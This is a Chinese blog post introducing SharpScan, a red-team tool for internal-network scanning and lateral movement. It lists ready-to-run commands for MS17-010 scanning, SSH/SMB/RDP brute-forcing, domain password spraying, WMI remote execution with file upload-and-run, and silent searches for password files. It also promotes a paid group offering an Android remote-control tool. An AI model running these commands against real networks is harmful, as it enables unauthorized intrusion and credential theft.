SharpScan: 内网资产扫描工具

标签：24 exe 扫描 192.168 SharpScan 工具 txt 244.1

免责声明
本系列工具仅供安全专业人员进行已授权环境使用，此工具所提供的功能只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用工具中的功能对任何计算机系统进行入侵操作。利用此工具所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责.
工具地址：点击领取

SharpScan 是一款由 INotGreen 开发的内网资产扫描工具，旨在提升内网横向移动和域内信息收集的效率。

主要特点

跨平台支持： 使用 .NET Framework 3.5 和 .NET Core 6.0 开发，兼容多种系统环境。
高效扫描： 采用异步高并发技术，扫描速度快且可控，内存自动回收。
无文件落地： 支持内存加载，避免在磁盘上留下文件痕迹。
小巧便携： 体积约 800KB，便于传输和使用。
安全隐蔽： 遵循 OPSEC 原则，减少日志记录，降低被检测风险。

主要功能

存活探测： 支持 ICMP、ARP 协议。
端口扫描： TCP 端口扫描，获取主机和网卡信息。
服务探测： 快速检测 NetBIOS、SMB、WMI 服务。
漏洞扫描： 检测如 EternalBlue（MS17-010）、 SMBGhost（CVE-2020-0796）、 ZeroLogon（CVE-2020-1472）等高危漏洞。
Web 信息收集： 获取网站标题，识别常见 CMS、 OA 框架。
弱口令爆破： 针对 SSH、 SMB、 RDP、 FTP 等服务进行账号密码爆破。
文件搜索： 全盘搜索特定文件。
代理功能： 提供 Socks5 代理支持。

其他功能

`SharpScan.exe -h 192.168.244.1/24 -nopoc (只做网段主机探测和端口扫描)SharpScan.exe -s 192.168.244.169 -p 80-1024 -d 0 -m 600 (Tcp端口扫描:80-1024，0延时，最大并发600)SharpScan.exe -t 192.168.244.141 -U -p 100-10000 (udp端口扫描:100-10000，10ms延时，最大并发600)SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a (C段ssh服务账号密码爆破,账号root，密码a)SharpScan.exe -h 192.168.244.1/24 -m smb -u administrator -pw a (C段smb服务账号密码爆破,账号administrator，密码a)SharpScan.exe -h 192.168.244.1/24 -m rdp -u administrator -pw a (C段rdp服务账号密码爆破,账号administrator，密码a)SharpScan.exe -h 192.168.244.1/24 -m smb -uf user.txt -pwf pass.txt (用账号密码本爆破C段的smb服务)SharpScan.exe -h 192.168.244.1/24 -m rdp -uf user.txt -pwf pass.txt (用账号密码本爆破C段的rdp服务)SharpScan.exe -h 192.168.244.1/24 -m ssh -uf user.txt -pwf pass.txt (用账号密码本爆破C段的ssh服务()SharpScan.exe -h 192.168.244.1/24 -m ms17010 (C段批量扫描是否存在ms17010)SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a -c "uname-a" (ssh命令执行C段枚举）SharpScan.exe -h 192.168.244.1.3 -m wmiexec -f cmd -c "ls C:\\Windows" (远程执行命令，通过注册表传递数据)SharpScan.exe -h 192.168.244.1.3 -m wmiexec -func upload -l C:\a.exe -r C:\\Windows\a.exe (上传文件到远程主机，-l是本地文件路径，-r是上传到远程主机的文件路径)SharpScan.exe -h 192.168.244.1.3 -m wmiexec -func uploadexec -l C:\a.exe -r C:\\Windows\a.exe (上传文件到远程主机并且执行文件)SharpScan.exe -h 192.168.244.1.3 -m userenum -uf user.txt (域内枚举用户名)SharpScan.exe -h 192.168.244.1.3 -m passwordspray -uf user.txt -pw abc123$% (域内密码喷洒)SharpScan.exe -h 192.168.244.1.3 -m passwordspray -uf user.txt -pwf pass.txt(域内密码喷洒)SharpScan.exe -s "pass.txt" (全盘静默检索pass.txt)SharpScan.exe -socks5 8000 -u test -pw 1234 (Socks5:8000，用户名:test，密码:1234)SharpScan.exe -h 192.168.244.1/24 -o output.txt (将扫描结果导出到output.txt)`

使用方法

基本用法： 在命令行中运行 SharpScan.exe，根据需要添加参数执行不同功能。
内存加载： 可通过 Inline-assembly 或 Execute-assembly 方式在内存中加载执行，避免文件落地。
端口扫描

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/4ccf314163424b6eb5260ea500455ce9.png#pic_center)

RDP爆破

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/0932480e20684f29a8fd573b31b626da.png#pic_center)

SSH爆破

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/4609c33eb9de4407b14230c5aa1a6e4b.png#pic_center)

SSH 命令执行

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/3d243152b3cd4cb7a44891896a9f755d.png#pic_center)

SMB爆破

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/abbce0663be54380bcd07c92be2979fc.png#pic_center)

全盘搜索

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/8c0132a4118f43338a06c3705aed24db.png#pic_center)

Socks5代理

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/92eff30a4b6d43d486dd1fa53415db12.png#pic_center)

注意事项

权限要求： 某些功能可能需要管理员权限。
安全合规： 请在合法授权范围内使用，遵守相关法律法规。

如对该工具感兴趣，欢迎访问 SharpScan 项目主页获取更多信息。

免责声明：请勿将此工具用于未经授权的渗透测试或任何非法活动。作者不对任何滥用或非法使用承担责任。

FreeBuf帮会

推荐加入我们的帮会，专为红队实战打造！帮会定期分享网上找不到的珍贵资源，特殊限时提供的安卓远控工具（7.4版）等。此外，还有大量Poc、渗透工具、课程资源以及实战案例，帮助你快速提升渗透技能。前100位仅需 99就可以享受终身使用！

![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/4faf0de0709b4afa80c0e49d3d7bb42e.jpeg#pic_center)

学习交流群

刚加入网络安全行业的小白，可以加入学习交流群，大家一起互相学习，互相进步，不会的难题大家一起学习，一起攻克。

想要进学习交流群的师傅们，可以点击上方工具链接，后台私信！（Ps：防止广告进群）。

标签：24,exe,扫描,192.168,SharpScan,工具,txt,244.1
From： https://blog.csdn.net/Xs_20240309/article/details/145248666